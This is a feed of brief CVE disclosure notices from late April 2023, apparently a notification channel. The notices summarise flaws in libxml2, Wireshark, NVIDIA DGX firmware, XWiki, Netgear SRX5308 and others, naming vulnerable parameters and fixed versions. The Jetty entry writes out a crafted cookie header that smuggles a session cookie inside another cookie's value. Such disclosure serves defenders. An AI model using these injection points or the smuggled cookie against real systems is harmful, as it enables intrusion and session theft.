🚨 CVE-2023-29469An issue was discovered in libxml2 before 2.10.4. When hashing empty dict strings in a crafted XML document, xmlDictComputeFastKey in dict.c can produce non-deterministic values, leading to various logic and memory errors, such as a double free. This behavior occurs because there is an attempt to use the first byte of an empty string, and any value is possible (not solely the '\0' value).🎖@cveNotify |
|
| 2023-04-30 17:58:12 |
🚨 CVE-2023-25076A buffer overflow vulnerability exists in the handling of wildcard backend hosts of SNIProxy 0.6.0-2 and the master branch (commit: 822bb80df9b7b345cc9eba55df74a07b498819ba). A specially crafted HTTP or TLS packet can lead to arbitrary code execution. An attacker could send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-30 05:58:30 |
🚨 CVE-2022-40897Python Packaging Authority (PyPA) setuptools before 65.5.1 allows remote attackers to cause a denial of service via HTML in a crafted package or custom PackageIndex page. There is a Regular Expression Denial of Service (ReDoS) in package_index.py.🎖@cveNotify |
|
| 2023-04-30 05:58:29 |
🚨 CVE-2023-26924** DISPUTED ** LLVM a0dab4950 has a segmentation fault in mlir::outlineSingleBlockRegion. NOTE: third parties dispute this because the LLVM security policy excludes "Language front-ends ... for which a malicious input file can cause undesirable behavior."🎖@cveNotify |
|
| 2023-04-30 05:58:28 |
🚨 CVE-2023-2428Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.13.🎖@cveNotify |
|
| 2023-04-30 01:58:28 |
🚨 CVE-2023-2426Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 9.0.1499.🎖@cveNotify |
|
| 2023-04-29 22:58:32 |
🚨 CVE-2023-1994GQUIC dissector crash in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-04-29 22:58:31 |
🚨 CVE-2023-1992RPCoRDMA dissector crash in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-04-29 22:58:30 |
🚨 CVE-2023-1993LISP dissector large loop in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-04-29 22:58:29 |
🚨 CVE-2023-1161ISO 15765 and ISO 10681 dissector crash in Wireshark 4.0.0 to 4.0.3 and 3.6.0 to 3.6.11 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-04-29 20:58:28 |
🚨 CVE-2022-23808An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.🎖@cveNotify |
|
| 2023-04-29 17:58:29 |
🚨 CVE-2023-30441IBM Runtime Environment, Java Technology Edition IBMJCEPlus and JSSE 8.0.7.0 through 8.0.7.11 components could expose sensitive information using a combination of flaws and configurations. IBM X-Force ID: 253188.🎖@cveNotify |
|
| 2023-04-29 14:58:26 |
🚨 CVE-2023-31485GitLab::API::v4 through 0.26 does not verify TLS certificates when connecting to a GitLab server, enabling machine-in-the-middle attacks.🎖@cveNotify |
|
| 2023-04-29 14:58:25 |
🚨 CVE-2023-31486HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.🎖@cveNotify |
|
| 2023-04-29 10:58:28 |
🚨 CVE-2022-4065A vulnerability was found in cbeust testng 7.5.0/7.6.0/7.6.1/7.7.0. It has been declared as critical. Affected by this vulnerability is the function testngXmlExistsInJar of the file testng-core/src/main/java/org/testng/JarFileUtils.java of the component XML File Parser. The manipulation leads to path traversal. The attack can be launched remotely. Upgrading to version 7.5.1 and 7.7.1 is able to address this issue. The name of the patch is 9150736cd2c123a6a3b60e6193630859f9f0422b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-214027.🎖@cveNotify |
|
| 2023-04-29 10:58:27 |
🚨 CVE-2023-29197guzzlehttp/psr7 is a PSR-7 HTTP message library implementation in PHP. Affected versions are subject to improper header parsing. An attacker could sneak in a newline (\n) into both the header names and values. While the specification states that \r\n\r\n is used to terminate the header list, many servers in the wild will also accept \n\n. This is a follow-up to CVE-2022-24775 where the fix was incomplete. The issue has been patched in versions 1.9.1 and 2.4.5. There are no known workarounds for this vulnerability. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-04-29 06:58:48 |
🚨 CVE-2023-31056CloverDX before 5.17.3 writes passwords to the audit log in certain situations, if the audit log is enabled and single sign-on is not employed. The fixed versions are 5.15.4, 5.16.2, 5.17.3, and 6.0.x.🎖@cveNotify |
|
| 2023-04-29 06:58:47 |
🚨 CVE-2023-0209NVIDIA DGX-1 SBIOS contains a vulnerability in the Uncore PEI module, where authentication of the code executed by SSA is missing, which may lead to arbitrary code execution, denial of service, escalation of privileges assisted by a firmware implant, information disclosure assisted by a firmware implant, data tampering, and SecureBoot bypass.🎖@cveNotify |
|
| 2023-04-29 06:58:46 |
🚨 CVE-2023-2118Insufficient access control in support ticket feature in Devolutions Server 2023.1.5.0 and below allows an authenticated attacker to send support tickets and download diagnostic files via specific endpoints.🎖@cveNotify |
|
| 2023-04-29 06:58:45 |
🚨 CVE-2023-25506NVIDIA DGX-1 contains a vulnerability in Ofbd in AMI SBIOS, where a preconditioned heap can allow a user with elevated privileges to cause an access beyond the end of a buffer, which may lead to code execution, escalation of privileges, denial of service and information disclosure. The scope of the impact of this vulnerability can extend to other components.🎖@cveNotify |
|
| 2023-04-29 06:58:41 |
🚨 CVE-2023-25508NVIDIA DGX-1 BMC contains a vulnerability in the IPMI handler, where an attacker with the appropriate level of authorization can upload and download arbitrary files under certain circumstances, which may lead to denial of service, escalation of privileges, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-04-29 06:58:40 |
🚨 CVE-2023-25505NVIDIA DGX-1 BMC contains a vulnerability in the IPMI handler of the AMI MegaRAC BMC , where an attacker with the appropriate level of authorization can cause a buffer overflow, which may lead to denial of service, information disclosure, or arbitrary code execution.🎖@cveNotify |
|
| 2023-04-29 06:58:39 |
🚨 CVE-2023-25507NVIDIA DGX-1 BMC contains a vulnerability in the SPX REST API, where an attacker with the appropriate level of authorization can inject arbitrary shell commands, which may lead to code execution, denial of service, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-04-29 06:58:38 |
🚨 CVE-2023-0200NVIDIA DGX-2 contains a vulnerability in OFBD where a user with high privileges and a pre-conditioned heap can cause an access beyond a buffers end, which may lead to code execution, escalation of privileges, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-04-29 06:58:35 |
🚨 CVE-2023-0201NVIDIA DGX-2 SBIOS contains a vulnerability in Bds, where a user with high privileges can cause a write beyond the bounds of an indexable resource, which may lead to code execution, denial of service, compromised integrity, and information disclosure.🎖@cveNotify |
|
| 2023-04-29 06:58:34 |
🚨 CVE-2023-0207NVIDIA DGX-2 SBIOS contains a vulnerability where an attacker may modify the ServerSetup NVRAM variable at runtime by executing privileged code. A successful exploit of this vulnerability may lead to denial of service.🎖@cveNotify |
|
| 2023-04-29 06:58:33 |
🚨 CVE-2023-2241A vulnerability, which was classified as critical, was found in PoDoFo 0.10.0. Affected is the function readXRefStreamEntry of the file PdfXRefStreamParserObject.cpp. The manipulation leads to heap-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The name of the patch is 535a786f124b739e3c857529cecc29e4eeb79778. It is recommended to apply a patch to fix this issue. VDB-227226 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-29 06:58:32 |
🚨 CVE-2023-0384User-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1 due to uncontrolled memory consumption for a scheduled job.🎖@cveNotify |
|
| 2023-04-29 06:58:28 |
🚨 CVE-2014-125099A vulnerability has been found in I Recommend This Plugin up to 3.7.2 on WordPress and classified as critical. Affected by this vulnerability is an unknown functionality of the file dot-irecommendthis.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 3.7.3 is able to address this issue. The name of the patch is 058b3ef5c7577bf557557904a53ecc8599b13649. It is recommended to upgrade the affected component. The identifier VDB-226309 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-29 06:58:27 |
🚨 CVE-2023-2191Cross-site Scripting (XSS) - Stored in GitHub repository azuracast/azuracast prior to 0.18.🎖@cveNotify |
|
| 2023-04-29 06:58:26 |
🚨 CVE-2021-33973Buffer Overflow vulnerability in Qihoo 360 Safe guard v12.1.0.1004, v12.1.0.1005, v13.1.0.1001 allows attacker to escalate priveleges.🎖@cveNotify |
|
| 2023-04-29 00:58:35 |
🚨 CVE-2023-2409A vulnerability, which was classified as critical, was found in SourceCodester AC Repair and Services System 1.0. This affects an unknown part of the file /admin/services/view_service.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227703.🎖@cveNotify |
|
| 2023-04-29 00:58:34 |
🚨 CVE-2023-2410A vulnerability has been found in SourceCodester AC Repair and Services System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/bookings/view_booking.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227704.🎖@cveNotify |
|
| 2023-04-29 00:58:32 |
🚨 CVE-2023-2411A vulnerability was found in SourceCodester AC Repair and Services System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/inquiries/view_inquiry.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227705 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-29 00:58:31 |
🚨 CVE-2023-31483tar/TarFileReader.cpp in Cauldron cbang before bastet-v8.1.17 has a directory traversal during extraction that allows the attacker to create or write to files outside the current directory via a crafted tar archive.🎖@cveNotify |
|
| 2023-04-29 00:58:30 |
🚨 CVE-2023-24269An arbitrary file upload vulnerability in the plugin upload function of Textpattern v4.8.8 allows attackers to execute arbitrary code via a crafted Zip file.🎖@cveNotify |
|
| 2023-04-29 00:58:29 |
🚨 CVE-2023-25496A privilege escalation vulnerability was reported in Lenovo Drivers Management Lenovo Driver Manager that could allow a local user to execute code with elevated privileges.🎖@cveNotify |
|
| 2023-04-29 00:58:28 |
🚨 CVE-2023-29056A valid LDAP user, under specific conditions, will default to read-only permissions when authenticating into XCC. To be vulnerable, XCC must be configured to use an LDAP server for Authentication/Authorization and have the login permission attribute not defined.🎖@cveNotify |
|
| 2023-04-29 00:58:27 |
🚨 CVE-2023-2395A vulnerability classified as problematic has been found in Netgear SRX5308 up to 4.3.5-3. This affects an unknown part of the component Web Management Interface. The manipulation of the argument Login.userAgent leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227673 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-29 00:58:25 |
🚨 CVE-2023-2396A vulnerability classified as problematic was found in Netgear SRX5308 up to 4.3.5-3. This vulnerability affects unknown code of the component Web Management Interface. The manipulation of the argument USERDBUsers.Password leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-227674 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-29 00:58:24 |
🚨 CVE-2023-2397A vulnerability, which was classified as problematic, has been found in SourceCodester Simple Mobile Comparison Website 1.0. This issue affects some unknown processing of the file classes/Master.php?f=save_field. The manipulation of the argument Field Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227675.🎖@cveNotify |
|
| 2023-04-29 00:58:23 |
🚨 CVE-2023-25495A valid, authenticated administrative user can query a web interface API to reveal the configured LDAP client password used by XCC to authenticate to an external LDAP server in certain configurations. There is no exposure where no LDAP client password is configured🎖@cveNotify |
|
| 2023-04-29 00:58:22 |
🚨 CVE-2023-26782An issue discovered in mccms 2.6.1 allows remote attackers to cause a denial of service via Backend management interface ->System Configuration->Cache Configuration->Cache security characters.🎖@cveNotify |
|
| 2023-04-29 00:58:20 |
🚨 CVE-2020-23647Cross Site Scripting (XSS) vulnerability in BoxBilling 4.19, 4.19.1, 4.20, and 4.21 allows remote attackers to run arbitrary code via the message field on the submit new ticket form.🎖@cveNotify |
|
| 2023-04-29 00:58:19 |
🚨 CVE-2020-21643Cross Site Scripting (XSS) vulnerability in HongCMS 3.0 allows attackers to run arbitrary code via the callback parameter to /ajax/myshop.🎖@cveNotify |
|
| 2023-04-29 00:58:18 |
🚨 CVE-2023-26781SQL injection vulnerability in mccms 2.6 allows remote attackers to run arbitrary SQL commands via Author Center ->Reader Comments ->Search.🎖@cveNotify |
|
| 2023-04-29 00:58:17 |
🚨 CVE-2023-26812Command execution vulnerability in the ActionEnter Class ins jfinal CMS version 5.1.0 allows attackers to execute arbitrary code via a created json file to the ueditor route.🎖@cveNotify |
|
| 2023-04-29 00:58:16 |
🚨 CVE-2023-26813SQL injection vulnerability in com.xnx3.wangmarket.plugin.dataDictionary.controller.DataDictionaryPluginController.java in wangmarket CMS 4.10 allows remote attackers to run arbitrary SQL commands via the TableName parameter to /plugin/dataDictionary/tableView.do.🎖@cveNotify |
|
| 2023-04-29 00:58:15 |
🚨 CVE-2023-2388A vulnerability, which was classified as problematic, has been found in Netgear SRX5308 up to 4.3.5-3. Affected by this issue is some unknown functionality of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.fromAddr leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-227666 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-29 00:58:14 |
🚨 CVE-2023-2389A vulnerability, which was classified as problematic, was found in Netgear SRX5308 up to 4.3.5-3. This affects an unknown part of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.emailServer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227667. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-29 00:58:13 |
🚨 CVE-2023-2390A vulnerability has been found in Netgear SRX5308 up to 4.3.5-3 and classified as problematic. This vulnerability affects unknown code of the file scgi-bin/platform.cgi?page=time_zone.htm of the component Web Management Interface. The manipulation of the argument ntp.server1 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227668. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-28 22:58:38 |
🚨 CVE-2023-2392A vulnerability was found in Netgear SRX5308 up to 4.3.5-3. It has been classified as problematic. Affected is an unknown function of the file scgi-bin/platform.cgi?page=time_zone.htm of the component Web Management Interface. The manipulation of the argument ManualDate.minutes leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-227670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-28 22:58:37 |
🚨 CVE-2023-2394A vulnerability was found in Netgear SRX5308 up to 4.3.5-3. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation of the argument wanName leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-28 22:58:36 |
🚨 CVE-2023-30405A cross-site scripting (XSS) vulnerability in Aigital Wireless-N Repeater Mini_Router v0.131229 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the wl_ssid parameter at /boafrm/formHomeWlanSetup.🎖@cveNotify |
|
| 2023-04-28 22:58:35 |
🚨 CVE-2023-30857@aedart/support is the support package for Ion, a monorepo for JavaScript/TypeScript packages. Prior to version `0.6.1`, there is a possible prototype pollution issue for the `MetadataRecord`, when merged with a base class' metadata object, in `meta` decorator from the `@aedart/support` package. The likelihood of exploitation is questionable, given that a class's metadata can only be set or altered when the class is decorated via `meta()`. Furthermore, object(s) of sensitive nature would have to be stored as metadata, before this can lead to a security impact. The issue has been patched in version `0.6.1`.🎖@cveNotify |
|
| 2023-04-28 22:58:31 |
🚨 CVE-2023-30858The Denosaurs emoji package provides emojis for dinosaurs. Starting in version 0.1.0 and prior to version 0.3.0, the reTrimSpace regex has 2nd degree polynomial inefficiency, leading to a delayed response given a big payload. The issue has been patched in 0.3.0. As a workaround, avoid using the `replace`, `unemojify`, or `strip` functions.🎖@cveNotify |
|
| 2023-04-28 22:58:29 |
🚨 CVE-2023-31470SmartDNS through 41 before 56d0332 allows an out-of-bounds write because of a stack-based buffer overflow in the _dns_encode_domain function in the dns.c file, via a crafted DNS request.🎖@cveNotify |
|
| 2023-04-28 22:58:28 |
🚨 CVE-2022-36983This vulnerability allows remote attackers to bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetSettings class. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-15919.🎖@cveNotify |
|
| 2023-04-28 22:58:27 |
🚨 CVE-2022-27645This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700v3 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within readycloud_control.cgi. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15762.🎖@cveNotify |
|
| 2023-04-28 22:58:23 |
🚨 CVE-2022-37381This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AFSpecial_KeystrokeEx method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-17110.🎖@cveNotify |
|
| 2023-04-28 22:58:22 |
🚨 CVE-2023-26782An issue discovered in mccms 2.6.1 allows remote attackers to cause a denial of service via Backend management interface ->System Configuration->Cache Configuration->Cache security characters.🎖@cveNotify |
|
| 2023-04-28 22:58:21 |
🚨 CVE-2020-23647Cross Site Scripting (XSS) vulnerability in BoxBilling 4.19, 4.19.1, 4.20, and 4.21 allows remote attackers to run arbitrary code via the message field on the submit new ticket form.🎖@cveNotify |
|
| 2023-04-28 22:58:20 |
🚨 CVE-2020-21643Cross Site Scripting (XSS) vulnerability in HongCMS 3.0 allows attackers to run arbitrary code via the callback parameter to /ajax/myshop.🎖@cveNotify |
|
| 2023-04-28 22:58:19 |
🚨 CVE-2023-26781SQL injection vulnerability in mccms 2.6 allows remote attackers to run arbitrary SQL commands via Author Center ->Reader Comments ->Search.🎖@cveNotify |
|
| 2023-04-28 22:58:15 |
🚨 CVE-2023-26812Command execution vulnerability in the ActionEnter Class ins jfinal CMS version 5.1.0 allows attackers to execute arbitrary code via a created json file to the ueditor route.🎖@cveNotify |
|
| 2023-04-28 22:58:14 |
🚨 CVE-2023-2388A vulnerability, which was classified as problematic, has been found in Netgear SRX5308 up to 4.3.5-3. Affected by this issue is some unknown functionality of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.fromAddr leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-227666 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-28 22:58:13 |
🚨 CVE-2023-2389A vulnerability, which was classified as problematic, was found in Netgear SRX5308 up to 4.3.5-3. This affects an unknown part of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.emailServer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227667. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-28 22:58:12 |
🚨 CVE-2023-2390A vulnerability has been found in Netgear SRX5308 up to 4.3.5-3 and classified as problematic. This vulnerability affects unknown code of the file scgi-bin/platform.cgi?page=time_zone.htm of the component Web Management Interface. The manipulation of the argument ntp.server1 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227668. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-28 21:58:33 |
🚨 CVE-2023-29514XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with edit rights on any document (e.g., their own user profile) can execute code with programming rights, leading to remote code execution. This vulnerability has been patched in XWiki 13.10.11, 14.4.8, 14.10.1 and 15.0 RC1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-28 21:58:32 |
🚨 CVE-2023-25759OS Command Injection in TripleData Reporting Engine in Tripleplay Platform releases prior to Caveman 3.4.0 allows authenticated users to run unprivileged OS level commands via a crafted request payload.🎖@cveNotify |
|
| 2023-04-28 21:58:29 |
🚨 CVE-2023-29510XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In XWiki, every user can add translations that are only applied to the current user. This also allows overriding existing translations. Such translations are often included in privileged contexts without any escaping which allows remote code execution for any user who has edit access on at least one document which could be the user's own profile where edit access is enabled by default. A mitigation for this vulnerability is part of XWiki 14.10.2 and XWiki 15.0 RC1: translations with user scope now require script right. This means that regular users cannot exploit this anymore as users don't have script right by default anymore starting with XWiki 14.10. There are no known workarounds apart from upgrading to a patched versions.🎖@cveNotify |
|
| 2023-04-28 21:58:28 |
🚨 CVE-2023-26049Jetty is a java based web server and servlet engine. Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with `"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. So, a cookie header such as: `DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d"` will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies. This has security implications because if, say, JSESSIONID is an HttpOnly cookie, and the DISPLAY_LANGUAGE cookie value is rendered on the page, an attacker can smuggle the JSESSIONID cookie into the DISPLAY_LANGUAGE cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server or its logging system. This issue has been addressed in versions 9.4.51, 10.0.14, 11.0.14, and 12.0.0.beta0 and users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-28 21:58:27 |
🚨 CVE-2023-1968Instruments with Illumina Universal Copy Service v2.x are vulnerable due to binding to an unrestricted IP address. An unauthenticated malicious actor could use UCS to listen on all IP addresses, including those capable of accepting remote communications. 🎖@cveNotify |
|
| 2023-04-28 21:58:23 |
🚨 CVE-2023-26021IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service as the server may crash when compiling a specially crafted SQL query using a LIMIT clause. IBM X-Force ID: 247864.🎖@cveNotify |
|
| 2023-04-28 21:58:22 |
🚨 CVE-2023-2386A vulnerability classified as problematic has been found in Netgear SRX5308 up to 4.3.5-3. Affected is an unknown function of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.toAddr leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227664. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-28 21:58:21 |
🚨 CVE-2023-2387A vulnerability classified as problematic was found in Netgear SRX5308 up to 4.3.5-3. Affected by this vulnerability is an unknown functionality of the file scgi-bin/platform.cgi?page=dmz_setup.htm of the component Web Management Interface. The manipulation of the argument winsServer1 leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227665 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-28 21:58:20 |
🚨 CVE-2023-30454An issue was discovered in ebankIT before 7. Document Object Model based XSS exists within the /Security/Transactions/Transactions.aspx endpoint. Users can supply their own JavaScript within the ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray POST parameter that will be passed to an eval() function and executed upon pressing the continue button.🎖@cveNotify |
|
| 2023-04-28 21:58:17 |
🚨 CVE-2023-26599XSS vulnerability in TripleSign in Tripleplay Platform releases prior to Caveman 3.4.0 allows attackers to inject client-side code to run as an authenticated user via a crafted link.🎖@cveNotify |
|
| 2023-04-28 21:58:16 |
🚨 CVE-2023-29522XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. This issue has been patched in XWiki 14.4.8, 14.10.3 and 15.0RC1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-28 21:58:15 |
🚨 CVE-2023-22580Due to improper input filtering in the sequalize js library, can malicious queries lead to sensitive information disclosure.🎖@cveNotify |
|
| 2023-04-28 18:58:30 |
🚨 CVE-2023-30854AVideo is an open source video platform. Prior to version 12.4, an OS Command Injection vulnerability in an authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution. This issue is fixed in version 12.4.🎖@cveNotify |
|
| 2023-04-28 18:58:28 |
🚨 CVE-2023-30856eDEX-UI is a science fiction terminal emulator. Versions 2.2.8 and prior are vulnerable to cross-site websocket hijacking. When running eDEX-UI and browsing the web, a malicious website can connect to eDEX's internal terminal control websocket, and send arbitrary commands to the shell. The project has been archived since 2021, and as of time of publication there are no plans to patch this issue and release a new version. Some workarounds are available, including shutting down eDEX-UI when browsing the web and ensuring the eDEX terminal runs with lowest possible privileges.🎖@cveNotify |
|
| 2023-04-28 18:58:27 |
🚨 CVE-2022-31643A potential security vulnerability has been identified in the system BIOS for certain HP PC products which may allow loss of integrity. HP is releasing firmware updates to mitigate the potential vulnerability.🎖@cveNotify |
|
| 2023-04-28 18:58:26 |
🚨 CVE-2023-2376A vulnerability was found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6. It has been classified as critical. Affected is an unknown function of the component Web Management Interface. The manipulation of the argument dpi leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227652.🎖@cveNotify |
|
| 2023-04-28 18:58:25 |
🚨 CVE-2023-2378A vulnerability was found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6. It has been rated as critical. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation of the argument suffix-rate-up leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-227654 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-28 18:58:23 |
🚨 CVE-2023-28471Concrete CMS (previously concrete5) before 9.2 is vulnerable to Stored XSS via a container name.🎖@cveNotify |
|
| 2023-04-28 18:58:22 |
🚨 CVE-2023-28472Concrete CMS (previously concrete5) before 9.2 does not have Secure and HTTP only attributes set for ccmPoll cookies.🎖@cveNotify |
|
| 2023-04-28 18:58:21 |
🚨 CVE-2023-28476Concrete CMS (previously concrete5) before 9.2 is vulnerable to Stored XSS on Tags on uploaded files.🎖@cveNotify |
|
| 2023-04-28 18:58:20 |
🚨 CVE-2023-28477Concrete CMS (previously concrete5) before 9.2 is vulnerable to stored XSS on API Integrations via the name parameter.🎖@cveNotify |
|
| 2023-04-28 18:58:18 |
🚨 CVE-2023-2370A vulnerability classified as critical has been found in SourceCodester Online DJ Management System 1.0. Affected is an unknown function of the file admin/events/manage_event.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-227646 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-28 18:58:17 |
🚨 CVE-2023-30123wuzhicms v4.1.0 is vulnerable to Cross Site Scripting (XSS) in the Member Center, Account Settings.🎖@cveNotify |
|
| 2023-04-28 18:58:15 |
🚨 CVE-2023-30125EyouCms V1.6.1-UTF8-sp1 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-04-28 18:58:14 |
🚨 CVE-2023-0834Incorrect Permission Assignment for Critical Resource vulnerability in HYPR Workforce Access on MacOS allows Privilege Escalation.This issue affects Workforce Access: from 6.12 before 8.1.🎖@cveNotify |
|
| 2023-04-28 16:58:32 |
🚨 CVE-2022-47522The IEEE 802.11 specifications through 802.11ax allow physically proximate attackers to intercept (possibly cleartext) target-destined frames by spoofing a target's MAC address, sending Power Save frames to the access point, and then sending other frames to the access point (such as authentication frames or re-association frames) to remove the target's original security context. This behavior occurs because the specifications do not require an access point to purge its transmit queue before removing a client's pairwise encryption key.🎖@cveNotify |
|
| 2023-04-28 16:58:31 |
